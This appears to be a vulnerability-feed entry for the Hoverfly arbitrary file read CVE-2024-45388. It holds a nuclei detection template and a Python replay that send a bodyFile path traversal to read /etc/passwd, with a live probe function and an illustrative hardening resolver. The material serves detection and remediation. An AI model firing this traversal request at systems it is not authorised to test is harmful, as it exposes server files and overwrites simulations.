Hoverfly < 1.10.3 - Arbitrary File Read

03 Jul 2026 13:39:16. Reported by ProjectDiscovery. Type: nuclei. Source: github.com

Hoverfly < 1.10.3 allows arbitrary file read via the /api/v2/simulation POST handler.

id: CVE-2024-45388

info:
  name: Hoverfly < 1.10.3 - Arbitrary File Read
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    Hoverfly is a lightweight service virtualization / API simulation / API mocking tool for developers and testers. The /api/v2/simulation POST handler allows users to create new simulation views from the contents of a user-specified file (the "bodyFile" field of a response). Because the path is not confined to a permitted directory, an attacker can abuse this feature to read arbitrary files from the Hoverfly server.
  impact: |
    Unauthenticated attackers can read arbitrary files from the Hoverfly server including sensitive configuration data.
  remediation: |
    Update Hoverfly to version 1.10.3 or later.
  reference:
    - https://github.com/advisories/GHSA-6xx4-x46f-f897
    - https://nvd.nist.gov/vuln/detail/CVE-2024-45388
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-45388
    cwe-id: CWE-20
    epss-score: 0.55864
    epss-percentile: 0.98923
  metadata:
    max-request: 1
    verified: true
    shodan-query: http.favicon.hash:1357234275
  tags: cve,cve2024,hoverfly,lfi,intrusive,vkev,vuln

http:
  - raw:
      - |
        PUT /api/v2/simulation HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {"data":{"pairs":[{"request":{},"response":{"bodyFile": "../../../../../../../etc/passwd","x":"aaa"}} ]},"meta":{"schemaVersion":"v5.3"}}

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
          - 'hoverflyVersion'
        condition: and

      - type: word
        part: header
        words:
          - application/json

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100bde7274a86bcdfc0b2b5fb5f2f04b81fb9577deadb7345b05fbe37f9185a806102200721081e72f7a1c7f73b4f1cc8e94778aed488df569855707f02ca905d70d69f:922c64590222798bb761d5b6d8e72950
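The template above does three things: it sends one PUT to /api/v2/simulation whose response "bodyFile" points outside the simulation directory, it then requires both regexes (the /etc/passwd root line and the "hoverflyVersion" key of the echoed simulation) plus a JSON content type and HTTP 200, and it recommends confining the path as the fix. The following is an added example, not code from the nuclei template or from the Hoverfly project: it reproduces the same raw request (PUT, exactly as the template sends it, although the description names the POST handler), evaluates the template's matcher logic offline against a constructed response, and shows an illustrative hardened bodyFile resolver. The sample response, the base directory and the resolver are assumptions for the demonstration and are not Hoverfly's actual patch.

```python
"""Offline replay of the CVE-2024-45388 probe logic plus an illustrative
bodyFile hardening check. Added example; not Hoverfly or nuclei code."""
import http.client
import json
import re
from pathlib import Path
from typing import Optional, Tuple

# The same traversal value the nuclei template places in response.bodyFile.
TRAVERSAL_BODY_FILE = "../../../../../../../etc/passwd"


def build_simulation(body_file: str) -> str:
    """Serialise the v5.3 simulation view the template PUTs to /api/v2/simulation."""
    view = {
        "data": {"pairs": [{"request": {}, "response": {"bodyFile": body_file, "x": "aaa"}}]},
        "meta": {"schemaVersion": "v5.3"},
    }
    return json.dumps(view, separators=(",", ":"))


def build_raw_request(host: str, body_file: str = TRAVERSAL_BODY_FILE) -> bytes:
    """Render the raw HTTP/1.1 request the template sends (PUT, form content type, JSON body)."""
    body = build_simulation(body_file)
    return (
        "PUT /api/v2/simulation HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n" + body
    ).encode()


# The template's matchers, combined with matchers-condition: and.
_ROOT_RE = re.compile(r"root:.*:0:0:")
_VERSION_RE = re.compile(r"hoverflyVersion")


def matches(status: int, headers: dict, body: str) -> bool:
    """True only when every matcher of the template would fire on this response."""
    regex_ok = bool(_ROOT_RE.search(body)) and bool(_VERSION_RE.search(body))
    # nuclei's part: header word matcher searches the whole header block.
    header_block = "\n".join(f"{k}: {v}" for k, v in headers.items())
    header_ok = "application/json" in header_block
    return regex_ok and header_ok and status == 200


def probe(host: str, port: int = 8888, timeout: float = 10.0) -> bool:
    """Send the probe to a live instance (assumed admin port 8888) and run the matchers."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    body = build_simulation(TRAVERSAL_BODY_FILE)
    conn.request("PUT", "/api/v2/simulation", body=body,
                 headers={"Content-Type": "application/x-www-form-urlencoded"})
    resp = conn.getresponse()
    text = resp.read().decode(errors="replace")
    conn.close()
    return matches(resp.status, dict(resp.getheaders()), text)


def resolve_body_file(base_dir: str, body_file: str) -> Optional[Path]:
    """Illustrative hardening (assumption, not Hoverfly's actual fix): accept a
    bodyFile only if it is relative and still inside base_dir after resolution."""
    base = Path(base_dir).resolve()
    if Path(body_file).is_absolute():
        return None
    target = (base / body_file).resolve()
    try:
        target.relative_to(base)
    except ValueError:
        return None  # escaped the simulation directory via ".."
    return target


# Constructed sample of what a vulnerable server echoes back after the PUT:
# the file contents land in response.body and meta carries hoverflyVersion.
SAMPLE_VULNERABLE_RESPONSE: Tuple[int, dict, str] = (
    200,
    {"Content-Type": "application/json"},
    json.dumps({
        "data": {"pairs": [{"request": {}, "response": {
            "status": 200, "body": "root:x:0:0:root:/root:/bin/bash\n"}}]},
        "meta": {"schemaVersion": "v5.3", "hoverflyVersion": "v1.10.2"},
    }),
)

# Constructed sample of a patched server rejecting the path.
SAMPLE_PATCHED_RESPONSE: Tuple[int, dict, str] = (
    400, {"Content-Type": "application/json"}, '{"error":"invalid bodyFile path"}')


if __name__ == "__main__":
    print(build_raw_request("127.0.0.1:8888").decode())
    print("vulnerable sample matches:", matches(*SAMPLE_VULNERABLE_RESPONSE))
    print("patched sample matches:", matches(*SAMPLE_PATCHED_RESPONSE))
    print("resolver accepts traversal:", resolve_body_file("/tmp/hoverfly-sim", TRAVERSAL_BODY_FILE))
```

Running probe() against an instance is intrusive in the same sense the template is tagged: a successful PUT replaces the target's current simulation, so use it only on instances you own or are authorised to test. The resolver is shown to make the remediation concrete; the authoritative fix is upgrading to 1.10.3 or later as the template states.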

Scores as of 04 Feb 2026 07:00: Vulners AI Score 6.1 (medium risk); CVSS 3.1 7.5; EPSS 0.55864.